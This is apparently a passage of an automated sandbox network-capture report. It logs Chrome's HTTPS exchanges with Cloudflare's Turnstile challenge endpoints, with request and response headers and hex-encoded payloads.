                                                                          2024-12-08 19:50:44 UTC1369INData Raw: 56 4a 31 74 6e 59 39 66 57 70 65 59 64 34 4f 41 59 6c 74 62 70 4b 61 6e 70 36 75 75 73 4b 71 6d 73 62 4f 70 70 47 2b 6d 73 37 4f 36 73 4c 61 2b 71 37 2b 31 76 4c 78 32 65 58 70 79 7a 6c 35 31 64 6e 64 34 65 58 70 37 66 48 31 2b 66 34 43 42 67 6f 4f 45 33 4d 2f 56 7a 4e 6a 68 6d 64 2f 53 34 73 50 5a 33 74 66 69 36 65 6d 65 33 65 33 6e 33 65 2f 6c 37 4f 79 6e 71 61 48 39 6a 61 53 6c 70 71 65 6f 71 61 71 72 72 4b 32 75 72 37 43 78 73 72 4f 30 74 62 61 33 45 41 4d 4a 41 41 77 56 7a 41 67 57 34 78 6a 62 7a 4d 37 68 73 63 6a 4a 79 73 76 4d 7a 63 37 50 30 4e 48 53 30 39 54 56 31 74 63 32 35 64 72 73 37 4f 33 75 36 50 76 4c 34 75 50 6b 35 65 62 6e 36 4f 6e 71 36 2b 7a 74 54 44 55 39 52 54 68 50 33 76 58 32 39 2f 6a 35 2b 76 76 38 2f 66 34 41 41 51 49 44 42 41 56
                                                                          Data Ascii: VJ1tnY9fWpeYd4OAYltbpKanp6uusKqmsbOppG+ms7O6sLa+q7+1vLx2eXpyzl51dnd4eXp7fH1+f4CBgoOE3M/VzNjhmd/S4sPZ3tfi6eme3e3n3e/l7OynqaH9jaSlpqeoqaqrrK2ur7CxsrO0tba3EAMJAAwVzAgW4xjbzM7hscjJysvMzc7P0NHS09TV1tc25drs7O3u6PvL4uPk5ebn6Onq6+ztTDU9RThP3vX29/j5+vv8/f4AAQIDBAV
                                                                          2024-12-08 19:50:44 UTC1369INData Raw: 45 31 4f 54 31 42 52 55 71 61 72 6e 71 71 61 6f 47 47 5a 6c 70 75 59 62 35 79 64 61 6d 4b 2b 54 6d 56 6d 5a 32 68 70 61 6d 74 73 62 57 35 76 63 48 46 79 63 33 53 34 74 38 71 39 67 4e 4c 4d 77 63 4b 6f 74 4a 4f 49 6e 47 32 45 68 59 61 48 6b 4d 2f 66 32 63 2f 68 31 39 37 65 6d 5a 75 54 37 33 2b 41 67 5a 69 5a 6d 70 75 63 6e 5a 36 66 39 75 4c 30 6f 2b 66 74 38 75 72 38 41 71 72 49 72 4f 7a 78 39 65 2f 30 2b 67 44 7a 2b 41 73 51 38 2f 6a 39 41 76 73 42 42 77 77 41 42 52 63 63 30 75 7a 78 47 78 55 57 32 77 6e 6e 74 38 37 50 30 4e 48 53 30 39 54 56 4c 52 6b 72 32 66 73 68 49 79 7a 30 33 2f 33 68 4b 54 6b 7a 4b 54 73 78 4f 44 6a 79 39 4f 78 4a 32 4e 6e 77 38 66 4c 7a 39 50 58 32 39 2f 6a 35 2b 76 74 47 52 50 34 49 51 44 31 43 50 78 5a 44 52 41 67 4b 4a 79 67 4d
                                                                          Data Ascii: E1OT1BRUqarnqqaoGGZlpuYb5ydamK+TmVmZ2hpamtsbW5vcHFyc3S4t8q9gNLMwcKotJOInG2EhYaHkM/f2c/h197emZuT73+AgZiZmpucnZ6f9uL0o+ft8ur8AqrIrOzx9e/0+gDz+AsQ8/j9AvsBBwwABRcc0uzxGxUW2wnnt87P0NHS09TVLRkr2fshIyz03/3hKTkzKTsxODjy9OxJ2Nnw8fLz9PX29/j5+vtGRP4IQD1CPxZDRAgKJygM
                                                                          2024-12-08 19:50:44 UTC1369INData Raw: 6d 68 5a 31 31 78 58 33 71 69 69 35 4e 76 5a 62 78 73 72 6e 2b 75 63 71 79 72 75 34 33 42 76 72 43 36 77 4c 65 2b 76 6e 6c 35 71 70 6d 58 6e 61 4f 33 76 62 2b 39 30 63 53 39 30 63 58 50 78 73 6a 57 79 74 6a 47 30 64 66 51 32 70 4f 57 71 65 48 56 35 65 66 6c 34 70 58 6a 6e 5a 36 68 35 71 6e 44 78 38 6e 56 37 62 4f 2f 2f 71 76 6d 33 63 6a 79 75 72 48 46 39 37 76 31 39 41 58 68 38 77 62 31 41 2f 73 4d 2f 51 7a 43 43 63 72 79 37 4f 7a 68 39 4f 33 6f 36 41 58 38 37 50 62 74 2b 66 30 4d 42 66 50 78 39 2f 33 62 33 39 73 67 2b 42 6f 62 37 4f 48 31 4b 4f 73 6d 4a 54 55 53 4a 44 59 6d 4d 79 77 38 4c 6a 7a 79 4f 66 6f 6a 48 52 30 53 4a 52 34 5a 47 54 55 70 48 53 63 65 49 43 34 69 4d 44 34 33 4a 69 51 71 4d 41 35 6a 45 42 52 56 5a 31 46 68 57 31 46 6a 57 57 42 67 45
                                                                          Data Ascii: mhZ11xX3qii5NvZbxsrn+ucqyru43BvrC6wLe+vnl5qpmXnaO3vb+90cS90cXPxsjWytjG0dfQ2pOWqeHV5efl4pXjnZ6h5qnDx8nV7bO//qvm3cjyurHF97v19AXh8wb1A/sM/QzCCcry7Ozh9O3o6AX87Pbt+f0MBfPx9/3b39sg+Bob7OH1KOsmJTUSJDYmMyw8LjzyOfojHR0SJR4ZGTUpHSceIC4iMD43JiQqMA5jEBRVZ1FhW1FjWWBgE


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          23192.168.2.449776104.18.95.414431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:50:46 UTC598OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/608171432:1733530697:8BWsYhk1SWZlRP7GpYN7tPMosN7A_9EHlf49BfqZObo/8eef4911a8e143cb/MZci78iv2CCudpo2.FGQ5mZ5Rf0uaBDJlbj5xATahfU-1733687437-1.1.1.1-orHo8b5s0mjHvI02qYmgkSKS324gw5u9MJx4_q2_vPNFnQ_SCLfrUsZYIz4F5ypF HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:50:46 UTC379INHTTP/1.1 404 Not Found
                                                                          Date: Sun, 08 Dec 2024 19:50:46 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 7
                                                                          Connection: close
                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          cf-chl-out: uTSOjIAqAzA/U6B6fCRHFu0WyLlWs24Qgc8=$WqnG2FvKw+FD68oV
                                                                          Server: cloudflare
                                                                          CF-RAY: 8eef494bac5d41df-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-12-08 19:50:46 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                          Data Ascii: invalid


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          24192.168.2.449777104.18.95.414431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:50:46 UTC812OUTGET /cdn-cgi/challenge-platform/h/g/pat/8eef4911a8e143cb/1733687444189/f6217f608b824ca04203a9dc66ad631785a35b06ac7270e998d764984692a685/R9JS_IJzkoaUp51 HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          Cache-Control: max-age=0
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/rgsuz/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:50:46 UTC143INHTTP/1.1 401 Unauthorized
                                                                          Date: Sun, 08 Dec 2024 19:50:46 GMT
                                                                          Content-Type: text/plain; charset=utf-8
                                                                          Content-Length: 1
                                                                          Connection: close
                                                                          2024-12-08 19:50:46 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 39 69 46 5f 59 49 75 43 54 4b 42 43 41 36 6e 63 5a 71 31 6a 46 34 57 6a 57 77 61 73 63 6e 44 70 6d 4e 64 6b 6d 45 61 53 70 6f 55 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                          Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20g9iF_YIuCTKBCA6ncZq1jF4WjWwascnDpmNdkmEaSpoUAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                          2024-12-08 19:50:46 UTC1INData Raw: 4a
                                                                          Data Ascii: J


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          25192.168.2.449778104.18.95.414431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:50:47 UTC783OUTGET /cdn-cgi/challenge-platform/h/g/i/8eef4911a8e143cb/1733687444189/TpwymHuahAs5EpN HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/rgsuz/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:50:48 UTC200INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:50:48 GMT
                                                                          Content-Type: image/png
                                                                          Content-Length: 61
                                                                          Connection: close
                                                                          Server: cloudflare
                                                                          CF-RAY: 8eef49570dda4393-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-12-08 19:50:48 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 27 00 00 00 32 08 02 00 00 00 50 da 55 4a 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                          Data Ascii: PNGIHDR'2PUJIDAT$IENDB`


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          26192.168.2.449779104.18.95.414431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:50:49 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8eef4911a8e143cb/1733687444189/TpwymHuahAs5EpN HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:50:50 UTC200INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:50:49 GMT
                                                                          Content-Type: image/png
                                                                          Content-Length: 61
                                                                          Connection: close
                                                                          Server: cloudflare
                                                                          CF-RAY: 8eef4961fb6143af-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-12-08 19:50:50 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 27 00 00 00 32 08 02 00 00 00 50 da 55 4a 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                          Data Ascii: PNGIHDR'2PUJIDAT$IENDB`


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          27192.168.2.449780104.18.95.414431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:50:49 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/608171432:1733530697:8BWsYhk1SWZlRP7GpYN7tPMosN7A_9EHlf49BfqZObo/8eef4911a8e143cb/MZci78iv2CCudpo2.FGQ5mZ5Rf0uaBDJlbj5xATahfU-1733687437-1.1.1.1-orHo8b5s0mjHvI02qYmgkSKS324gw5u9MJx4_q2_vPNFnQ_SCLfrUsZYIz4F5ypF HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 27161
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Content-type: application/x-www-form-urlencoded
                                                                          CF-Chl-RetryAttempt: 1
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          CF-Challenge: MZci78iv2CCudpo2.FGQ5mZ5Rf0uaBDJlbj5xATahfU-1733687437-1.1.1.1-orHo8b5s0mjHvI02qYmgkSKS324gw5u9MJx4_q2_vPNFnQ_SCLfrUsZYIz4F5ypF
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Origin: https://challenges.cloudflare.com
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/rgsuz/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:50:49 UTC16384OUTData Raw: 76 5f 38 65 65 66 34 39 31 31 61 38 65 31 34 33 63 62 3d 4e 64 4b 72 77 75 49 51 54 75 54 45 64 4d 51 66 34 79 4d 6f 72 61 72 30 66 49 37 75 52 4d 46 72 4e 4b 56 76 4d 6e 47 4d 39 4b 49 78 4d 4f 72 56 66 73 56 75 4d 61 72 4b 4b 75 2d 30 4b 4d 4e 75 4d 49 53 37 4f 4d 75 55 46 55 55 4d 44 73 75 4a 51 69 79 4d 6b 35 4d 64 79 55 49 48 66 38 30 4b 75 76 63 4d 49 68 54 4d 6f 61 56 4d 4d 24 74 69 33 73 49 65 4e 4d 56 34 4d 44 61 4d 56 45 53 72 4b 41 34 4d 65 35 58 79 5a 39 32 4d 4e 54 5a 6e 6d 31 73 4d 51 33 51 78 48 55 35 35 65 75 32 42 45 72 35 4d 37 33 75 4b 57 6b 77 5a 6d 55 25 32 62 72 59 77 51 53 48 4d 4b 42 37 47 68 6e 30 44 32 37 4d 37 4e 72 57 70 38 6d 4d 56 4e 57 52 75 59 35 43 59 33 2d 73 54 49 4e 37 43 6d 68 42 68 57 6e 5a 68 4f 2d 57 31 56 79 68 54
                                                                          Data Ascii: v_8eef4911a8e143cb=NdKrwuIQTuTEdMQf4yMorar0fI7uRMFrNKVvMnGM9KIxMOrVfsVuMarKKu-0KMNuMIS7OMuUFUUMDsuJQiyMk5MdyUIHf80KuvcMIhTMoaVMM$ti3sIeNMV4MDaMVESrKA4Me5XyZ92MNTZnm1sMQ3QxHU55eu2BEr5M73uKWkwZmU%2brYwQSHMKB7Ghn0D27M7NrWp8mMVNWRuY5CY3-sTIN7CmhBhWnZhO-W1VyhT
                                                                          2024-12-08 19:50:49 UTC10777OUTData Raw: 4d 4b 72 24 55 56 79 49 45 4d 48 72 78 53 69 4d 75 4b 4d 4b 4d 7a 4d 47 64 4b 72 49 6d 46 5a 4d 4e 72 30 50 4d 51 4d 74 76 37 64 49 52 4d 39 72 37 37 4d 70 4d 7a 55 37 32 4d 33 37 49 55 24 34 4d 38 4d 51 55 75 50 49 7a 4d 4d 73 75 45 49 33 4d 6d 73 56 35 49 30 4d 39 72 4d 4d 4d 2b 39 4d 49 4b 49 57 4d 61 55 30 4c 49 37 68 70 54 70 73 75 4a 4d 4b 6f 44 4b 49 6c 66 45 4d 75 30 49 33 74 62 73 37 50 4d 4a 4d 75 55 49 73 75 4e 72 42 34 24 71 4e 5a 4d 30 51 73 51 4e 57 72 62 73 61 58 49 47 55 45 33 72 76 4d 4f 4d 45 4d 30 41 72 30 4d 58 73 4d 76 4d 4c 55 63 4b 30 62 49 6c 66 7a 50 30 64 49 71 4d 34 54 49 72 49 42 55 58 73 75 52 72 4c 55 6b 72 61 58 49 68 72 63 52 4d 66 62 58 4d 4e 51 4d 4b 49 54 73 4b 51 30 41 72 45 4b 4e 50 4d 30 42 66 73 66 4b 30 76 4d 41 54
                                                                          Data Ascii: MKr$UVyIEMHrxSiMuKMKMzMGdKrImFZMNr0PMQMtv7dIRM9r77MpMzU72M37IU$4M8MQUuPIzMMsuEI3MmsV5I0M9rMMM+9MIKIWMaU0LI7hpTpsuJMKoDKIlfEMu0I3tbs7PMJMuUIsuNrB4$qNZM0QsQNWrbsaXIGUE3rvMOMEM0Ar0MXsMvMLUcK0bIlfzP0dIqM4TIrIBUXsuRrLUkraXIhrcRMfbXMNQMKITsKQ0ArEKNPM0BfsfK0vMAT
                                                                          2024-12-08 19:50:50 UTC334INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:50:50 GMT
                                                                          Content-Type: text/plain; charset=UTF-8
                                                                          Content-Length: 22920
                                                                          Connection: close
                                                                          cf-chl-gen: iPiuJuF9lb/k0kOisPg/WZBaRWdQQskcig/R78MyBJFz1jUVrvzJhRjpwXWzFF0wW2FST8anLbmb7y1zhw==$cdhg4Fxa/odsUrEV
                                                                          Server: cloudflare
                                                                          CF-RAY: 8eef49621d1d423f-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-12-08 19:50:50 UTC1035INData Raw: 6a 6f 47 48 66 6f 71 54 53 33 31 63 68 70 61 51 68 70 69 4f 6c 5a 56 51 55 71 57 6f 5a 30 32 6c 6d 4a 36 56 6f 61 70 69 6c 4a 46 6e 6c 58 5a 68 6e 47 4e 34 58 72 61 70 72 36 61 79 75 33 4f 6c 6f 6e 6d 6d 68 33 4b 75 64 49 6c 76 63 48 46 79 79 62 58 48 64 72 61 37 76 37 6d 2b 78 4d 6d 39 77 74 54 5a 67 71 43 45 78 74 6a 4f 33 64 62 50 32 65 44 67 79 5a 2f 4e 72 48 79 54 6c 4a 57 57 37 64 6e 72 6d 75 37 68 36 2b 4c 52 35 66 4c 33 36 50 66 35 70 73 53 6f 36 76 7a 79 41 76 72 7a 2f 51 55 46 37 63 54 78 30 4b 43 68 75 4c 6d 36 75 77 59 45 76 73 63 41 42 51 6b 44 43 41 34 54 42 77 77 65 49 39 6e 7a 2b 43 49 63 48 65 4c 53 38 50 48 79 31 75 66 68 32 54 62 46 78 74 33 65 33 2b 44 68 34 75 50 6b 4a 53 6f 75 4b 43 30 7a 4f 43 77 78 51 30 6a 77 44 2f 4a 50 33 76 58
                                                                          Data Ascii: joGHfoqTS31chpaQhpiOlZVQUqWoZ02lmJ6VoapilJFnlXZhnGN4Xrapr6ayu3Olonmmh3KudIlvcHFyybXHdra7v7m+xMm9wtTZgqCExtjO3dbP2eDgyZ/NrHyTlJWW7dnrmu7h6+LR5fL36Pf5psSo6vzyAvrz/QUF7cTx0KChuLm6uwYEvscABQkDCA4TBwweI9nz+CIcHeLS8PHy1ufh2TbFxt3e3+Dh4uPkJSouKC0zOCwxQ0jwD/JP3vX
                                                                          2024-12-08 19:50:50 UTC1369INData Raw: 43 51 30 52 46 52 6b 65 55 69 70 64 74 6f 46 31 6f 54 36 65 61 6f 4a 65 6a 72 47 53 57 6d 35 2b 5a 6e 71 53 70 6e 61 36 77 74 58 43 6d 72 4c 47 48 74 37 47 2f 6b 36 39 34 56 32 35 76 63 48 46 79 63 33 52 31 64 6e 64 34 65 62 32 78 70 39 61 54 6d 59 44 59 79 39 48 49 31 4e 32 56 78 38 7a 51 79 73 2f 56 32 73 37 66 34 65 61 68 31 39 33 69 75 4f 6a 69 7a 65 54 77 34 75 6e 6b 2b 61 32 4d 6f 36 53 6c 70 71 65 6f 71 61 71 72 72 4b 32 75 31 2b 49 48 42 41 50 49 7a 37 59 50 41 67 6a 2b 43 78 54 4c 2f 51 4d 48 41 51 59 4d 45 51 55 57 47 42 33 58 44 68 51 5a 37 68 38 5a 38 52 55 6e 48 53 51 6b 34 73 48 59 32 64 72 62 33 4e 33 65 33 2b 44 68 34 75 4d 76 4b 68 4d 32 2b 77 54 71 51 7a 59 38 4d 7a 39 49 41 44 49 33 4f 7a 55 36 51 45 55 35 53 6b 78 52 44 45 4a 49 54 53
                                                                          Data Ascii: CQ0RFRkeUipdtoF1oT6eaoJejrGSWm5+ZnqSpna6wtXCmrLGHt7G/k694V25vcHFyc3R1dnd4eb2xp9aTmYDYy9HI1N2Vx8zQys/V2s7f4eah193iuOjizeTw4unk+a2Mo6SlpqeoqaqrrK2u1+IHBAPIz7YPAgj+CxTL/QMHAQYMEQUWGB3XDhQZ7h8Z8RUnHSQk4sHY2drb3N3e3+Dh4uMvKhM2+wTqQzY8Mz9IADI3OzU6QEU5SkxRDEJITS
                                                                          2024-12-08 19:50:50 UTC1369INData Raw: 53 55 70 4c 54 45 31 4f 54 35 2b 56 6e 6e 74 6c 62 31 61 75 6f 61 65 65 71 72 4e 72 6e 61 4b 6d 6f 4b 57 72 73 4b 53 31 74 37 78 33 6a 4c 4f 62 6d 5a 79 44 63 48 35 79 79 72 33 44 75 73 62 50 68 37 6d 2b 77 72 7a 42 78 38 7a 41 30 64 50 59 6b 37 50 64 30 71 36 31 6e 5a 68 33 6a 6f 2b 51 6b 5a 4b 54 6c 4a 57 57 6c 35 69 5a 7a 66 4c 56 79 72 4f 35 6f 50 6a 72 38 65 6a 30 2f 62 58 6e 37 50 44 71 37 2f 58 36 37 67 41 43 42 38 48 6e 44 65 2f 6b 7a 63 57 6b 75 37 79 39 76 72 2f 41 77 63 4c 44 78 4d 58 47 36 67 76 75 2b 64 37 6d 7a 53 59 5a 48 78 59 69 4b 2b 49 56 47 68 34 59 48 53 4d 6f 48 43 30 76 4e 4f 34 46 4a 51 6b 55 2b 50 4c 52 36 4f 6e 71 36 2b 7a 74 37 75 39 4f 44 64 7a 64 39 50 58 32 39 2f 6a 35 2b 76 74 54 50 31 45 41 52 31 52 53 55 53 68 4f 53 46 6f
                                                                          Data Ascii: SUpLTE1OT5+Vnntlb1auoaeeqrNrnaKmoKWrsKS1t7x3jLObmZyDcH5yyr3DusbPh7m+wrzBx8zA0dPYk7Pd0q61nZh3jo+QkZKTlJWWl5iZzfLVyrO5oPjr8ej0/bXn7PDq7/X67gACB8HnDe/kzcWku7y9vr/AwcLDxMXG6gvu+d7mzSYZHxYiK+IVGh4YHSMoHC0vNO4FJQkU+PLR6Onq6+zt7u9ODdzd9PX29/j5+vtTP1EAR1RSUShOSFo
                                                                          2024-12-08 19:50:50 UTC1369INData Raw: 56 5a 52 6c 71 4b 58 71 71 4f 63 70 71 31 6f 6e 61 75 68 74 32 32 70 72 37 43 6f 74 6f 32 61 6c 4a 52 70 68 34 69 4a 62 58 57 72 76 6e 68 63 63 33 52 31 64 6e 64 34 65 58 70 37 66 48 31 2b 68 59 61 42 78 74 4c 48 32 74 50 4d 31 74 32 59 30 39 48 4f 30 70 33 54 34 4e 2f 6a 31 65 66 62 75 2b 66 63 37 2b 6a 68 36 2f 4c 50 37 2f 54 72 39 2b 33 30 39 4b 2f 73 2b 4f 30 42 2b 66 4c 38 42 4c 37 7a 41 76 63 4f 76 71 43 33 75 4c 6d 36 75 37 79 39 76 72 2f 41 77 63 4c 4a 79 73 55 65 45 52 63 4f 47 69 50 61 44 52 49 57 45 42 55 62 49 42 51 6c 4a 79 7a 6d 46 41 6b 6d 4e 50 48 73 4d 54 59 6e 4e 54 30 59 4b 7a 4d 74 4c 44 34 36 50 76 54 30 51 6b 52 4b 50 6a 6a 36 2f 51 51 36 52 30 5a 4b 50 45 35 43 49 6b 35 44 56 6b 39 49 55 6c 6b 32 56 6c 74 53 58 6c 52 62 57 78 5a 6d
                                                                          Data Ascii: VZRlqKXqqOcpq1onauht22pr7Coto2alJRph4iJbXWrvnhcc3R1dnd4eXp7fH1+hYaBxtLH2tPM1t2Y09HO0p3T4N/j1efbu+fc7+jh6/LP7/Tr9+309K/s+O0B+fL8BL7zAvcOvqC3uLm6u7y9vr/AwcLJysUeERcOGiPaDRIWEBUbIBQlJyzmFAkmNPHsMTYnNT0YKzMtLD46PvT0QkRKPjj6/QQ6R0ZKPE5CIk5DVk9IUlk2VltSXlRbWxZm
                                                                          2024-12-08 19:50:50 UTC1369INData Raw: 6d 66 70 4a 69 70 71 37 42 72 6d 49 32 71 75 48 5a 78 74 62 71 72 75 63 47 63 72 37 65 78 73 4d 4b 2b 77 6e 6c 35 74 37 33 4c 66 59 43 42 65 59 42 37 68 4b 76 4e 77 38 57 50 70 72 4b 6e 75 72 4f 73 74 72 33 4a 75 37 76 41 74 38 4f 35 77 4d 44 53 75 4c 37 4a 75 73 66 48 79 4d 43 2f 30 63 50 44 6f 50 32 69 30 66 50 70 36 37 58 4d 32 4d 33 67 32 64 4c 63 34 2b 2f 68 34 65 62 64 36 64 2f 6d 35 76 6a 67 36 75 6a 70 37 66 62 70 37 2b 6e 44 49 63 58 30 46 77 30 50 32 4f 2f 37 38 41 54 38 39 51 41 48 45 77 55 46 43 67 45 4e 41 77 6f 4b 48 41 63 4d 45 41 30 48 45 41 6b 54 47 67 67 63 45 68 6b 5a 4b 79 41 65 46 42 4d 61 47 42 77 58 2f 64 2f 32 39 2f 6a 35 2b 76 76 38 2f 54 77 4a 48 4f 73 44 42 41 55 47 5a 50 48 79 43 67 73 4d 44 55 31 53 56 6c 42 56 57 32 42 55 57
                                                                          Data Ascii: mfpJipq7BrmI2quHZxtbqrucGcr7exsMK+wnl5t73LfYCBeYB7hKvNw8WPprKnurOstr3Ju7vAt8O5wMDSuL7JusfHyMC/0cPDoP2i0fPp67XM2M3g2dLc4+/h4ebd6d/m5vjg6ujp7fbp7+nDIcX0Fw0P2O/78AT89QAHEwUFCgENAwoKHAcMEA0HEAkTGggcEhkZKyAeFBMaGBwX/d/29/j5+vv8/TwJHOsDBAUGZPHyCgsMDU1SVlBVW2BUW
